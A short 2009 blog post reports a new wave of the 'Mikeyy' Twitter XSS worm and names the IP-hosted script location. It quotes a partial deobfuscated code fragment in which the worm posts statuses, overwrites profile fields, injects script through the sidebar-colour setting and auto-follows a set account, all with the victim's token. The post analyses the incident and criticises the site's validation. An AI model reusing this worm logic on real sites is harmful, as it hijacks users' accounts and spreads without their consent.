News from Apr 17, 2009
2009/04/17
It's back, but this time it seems like they're jealous at Mikeyy getting a new job. Somebody hacked his site and actually stored the new XSS Script on it.
This script is now hosted at 74.200.253.195/xss.js, which according to this blog it used to host Mikeyy's servers (Haxyou.com, Michangelomooney.com and Stalkdaily.com). I tried to get the addresses but I've got server timeouts, probably the DNS servers for the domains were changed too, that's why the script uses the ip address instead of the host name.
What's new is that the script exploits another field that is not validated, meaning that Twitter have not cleaned up their mess. as I've pointed out they have to look at every posted request.
var _0x4874x1b = new XHConn();
_0x4874x1b.connect("/status/update", "POST",
"authenticity_token=" +
_0x4874x15 + "&status=" + _0x4874x1a +
"&return_rendered_status=true&twttr=true");
var _0x4874x1c = new XHConn();
_0x4874x1c.connect("/account/settings", "POST",
"authenticity_token=" + _0x4874x15 +
"&user[name]=" + bypassEncode +
"&user[url]=" + bypassEncode +
"&user[description]=" + bypassEncode +
"&user[location]=" + bypassEncode +
"&user[protected]=0&commit=Save");
var _0x4874x1d = new XHConn();
_0x4874x1d.connect("/account/profile_settings", "POST",
"authenticity_token=" +
_0x4874x15 + "&user[profile_sidebar_border_color]=" +
xss + " &commit=save+changes");
var _0x4874x1e = new XHConn();
_0x4874x1e.connect("/friendships/create/32336151", "POST",
"authenticity_token=" + _0x4874x15 + "&twttr=true");
The code is injected in the profile side bar color. What's funny too is that it adds a friendship to user # 32336151... haven't figured out who is...
|
April 2009 |
|
||||
|---|---|---|---|---|---|---|
| Sun | Mon | Tue | Wed | Thu | Fri | Sat |
| 1 | 2 | 3 | 4 | |||
| 5 | 6 | 7 | 8 | 9 | 10 | 11 |
| 12 | 13 | 14 | 15 | 16 | 17 | 18 |
| 19 | 20 | 21 | 22 | 23 | 24 | 25 |
| 26 | 27 | 28 | 29 | 30 | ||
Oct 30, 2009
Apr 12, 2009